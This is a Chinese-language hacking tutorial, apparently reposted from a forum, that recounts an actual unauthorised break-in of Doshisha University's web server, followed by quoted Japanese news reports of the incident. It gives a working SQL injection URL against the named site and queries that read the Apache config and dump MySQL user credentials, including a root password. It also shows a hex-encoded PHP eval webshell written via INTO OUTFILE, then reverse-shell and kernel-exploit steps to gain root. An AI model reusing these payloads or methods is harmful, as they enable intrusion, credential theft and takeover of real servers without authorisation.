想从妹子毕业的学校搞点资料什么的,然后他就YD的渗透了,然后就成功了。然后就把注入的段子发给了我,抓我做壮丁,让我把权提了,顺便写个教程发出来,因为论坛没有太多关于Linux提权的教程~~~~
先是注入点:
http://www.doshisha.ac.jp/chs/news/index.php?i=-1
然后联合查询,猜字段,查版本,查密码,读取文件…….就是各种查啊,语句是:
|
1
|
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+1,@@datadir,3,load_file(‘/etc/httpd/conf/httpd.conf’),5,group_concat(DISTINCT+user,0x3a,password,0x3a,file_priv,0x3a,host),7,8+from+mysql.user
|
//@@datadir为数据库文件路径
//load_file读取网站容器apache的配置文件
//group_concat读取MySQL管理员的名字、密码、是否允许读写文件和允许登录的远程计算机
虽然解得MySQL的root账户密码为mysql00,但是host为localhost,只允许本机登陆,所以用处不大。
而且Apache的配置文件显示,服务器拒绝非该大学的ip访问/admin/和phpMyAdmin,所以即使爆出管理员账户密码也没用。
前面load_file是因为发现了各文件夹权限限制的死,不允许外校ip登陆,所以就猜了一下apache的配置文件绝对路径为默认,后来发现还真的是默认的路径。
既然已经知道了Apache的配置文件的内容,我们也就轻易知道了网站物理路径,路径为:/http/www/koho/
虽然/admin和phpMyAdmin的目录都限制了,但是想了想,我们只要有注入点就可以可以写入shell了,因为php的GPC为off,怎么判断为off我就不说了。
直接写一句话:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
http://www.doshisha.ac.jp/chs/news/index.php?i=-1+union+select+ 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E,0x3c3f2f2a,3,4,5,6,7,0x2a2f3f3e+into+outfile+’/http/www/koho/english/engnews_img/aa.php’#
//最后的#是为了闭合前面的语句
/*其中的0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
为一句话<?php @eval($_POST['cmd']);?>的HEX编码,不懂(HEX编码)的话Google一下就好*/
//如果直接select 一句话 into outfile ‘路径’会提示字段数不同,所以select 1,2,3,4…来执行注入语句
//后面的0x3c3f2f2a和0x2a2f3f3e分别为’<?php //’的和’?>’HEX因为select后面的3,4,5,6会被写入webshell中,可能会导致一句话执行错误
//所以最后aa.php的内容就是”<?php @eval($_POST['cmd']);?><?php //3,4,5,6,7 ?>”
|
HEX其实就是十六进制编码,不知道这个编码的话,去搜一下好了,HEX编码转换在线本地各种工具各种有
通过上述注入语句,我们就得到了一句话木马:
|
1
|
http://www.doshisha.ac.jp/english/engnews_img/aa.php
|
复制代码用菜刀连接,密码是cmd,如图所示:
上传大马,得到:http://www.doshisha.ac.jp/english/engnews_img/script.php
直接用shell里面的反弹功能反弹到本地先,本地监听:
远程服务器端转发:
然后在命令提示行里看了一下,现在的权限是:
之后按照惯例我看了一下/tmp/文件夹,发现/TMP/权限居然被禁掉了,很少有服务器禁掉这个文件夹的。
好在赋权给这个文件夹不需要root,直接执行赋权语句:
|
1
|
chmod +x /tmp/
|
复制代码在这说一下,linux里面的文件夹跟文件一样,执行命令自然也可以按照像文件一样的执行
然后就查了一下内核版本:
|
1
2
3
|
uname-a
//其实lsb_release -a
|
如图所示:
内核版本:linux mainz1 2.6.28-194.e15
系统描述为:Red Hat Enterprise Linux Server release 5.5 (Tikanga)
查完了系统版本之后就去找找相应的提权脚本!~然后传到/tmp/文件夹
然后给予执行权限
一般我都是传上去c源文件,然后”gcc -o /tmp/程序 /tmp/C源码”这样,如果gcc不能用,在其他机器编译好了直接传上去其实也可以,就像这样
|
1
|
chmod +x /tmp/2.6.18-194
|
然后直接执行!~
得到了root权限好的,文章到此结束。说点额外话
我们驻扎在这个学校的服务器还没有改过数据,删过东西,第六天管理员就把网站关闭了并且踢了我们,效率很高。关站以后公告如下:
ホームページの一時停止について
過日、本学ホームページのWebサーバに対し不正アクセスがありました。
当該Webサーバは個人情報を管理する役割を持たないため、個人情報漏洩等の被害は
無いと認識しておりますが、第三者機関による詳細調査と更なる不正アクセスの防止のため、
現在は本学公式ホームページを閉鎖し、代替措置として下記の簡易コンテンツを
掲載のうえ、復旧に努めています。
大変なご不便・ご迷惑をおかけいたしますが、何卒ご理解とご協力を賜りますようお願い申し上げます。
关闭网站还是小事,众所周知日本有四大报业集团,关闭网站后日本的四大报业均报道了这件事情,新闻链接和摘抄如下:
每日新闻的报道:http://mainichi.jp/select/biz/news/20120114k0000e040185000c.html
- 同志社大:不正アクセスでHP閉鎖
- 同志社大(京都市)がホームページ(HP)のサーバーに不正アクセスがあったとして、HPを閉鎖していたことが14日、分かった。HPの改ざんや個人情報の流出は確認されていない。
- 同大学によると、中国のインターネット掲示板に同大学へのサイバー攻撃を呼びかける書き込みが見つかった。中国からの不正アクセスとみて侵入経路を調べるとともに、受験情報などを簡易版HPで掲載している。
- 今月6日に大学職員がサーバーの定期チェックをし、外部から侵入された形跡を発見。サーバー内に個人情報は保存されておらず、入試問題を含め情報漏えいは無いという。同大学は外部のセキュリティー管理会社に調査を依頼し、11日からHPを閉鎖している。【五十嵐和大】
朝日新闻社的报道:http://www.asahi.com/digital/internet/OSK201201140064.html
同志社大に不正アクセス、HP閉鎖 中国からの閲覧急増
同 志社大(京都市上京区)はサーバーに不正アクセスがあったとして、公式ホームページ(HP)を11日から閉鎖し、代替用に簡易版HPを設けた。職員が6 日、データを書き換えようとした痕跡を見つけ調査。年末年始に中国からの閲覧者が急増し、中国のハッカー用掲示板に同志社大のHPを攻撃する方法が掲載さ れたという。HPは大学案内が中心で個人情報は掲載しておらず、情報がもれた形跡もないという。さらなる不正アクセスを防止するため業者に詳しい調査を依 頼し、セキュリティーのレベルを上げるという
看到这里我感触很深。在日本一个普通大学被入侵,虽然没有任何损失,但是由于日本的媒体曝光和问责制度,除了逼迫着管理人员加强安全措施,更让原负责任丢了饭碗。
和这个行程鲜明对比的是,网站被驻扎一年不改改首页管理员是不会知道的,被踢出去也是被后面上来的黑客踢出去的。
就算是网站首页被改,因为网站运营者不重视,管理员没责任,黑客还是进出自如,脱库、挂马、改页,样样不缺。
这真的是差距。(91ri.org:这才是值得我们思考的地方!)
总结:
这个注入点的基本思路就是,发现MySQL账户为root,GPC设置为off,搞到了物理路径就直接写Webshell了
提权部分原理就是,本地监听端口,将对方机器反弹回cmdshell来,然后把和内核版本对应的EXP传上去,编译运行,得到root
91ri.org:我在文章中看到91RI的收藏链接感到非常荣幸 看来文章作者也是我们的忠实读者啊!这里顺便给作者提个建议,下次日站的时候尽量把原文地址给隐藏起来 免得被万人骑…
很多在对渗透国外的网站都感觉无从下手 这里推荐介绍一篇国外黑客们渗透思路的文章:《国外黑客们的入侵网站思路》 大家可以参考学习一下!
作者:YoCo Smart &DarkSn0w [blackbap.org] 由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。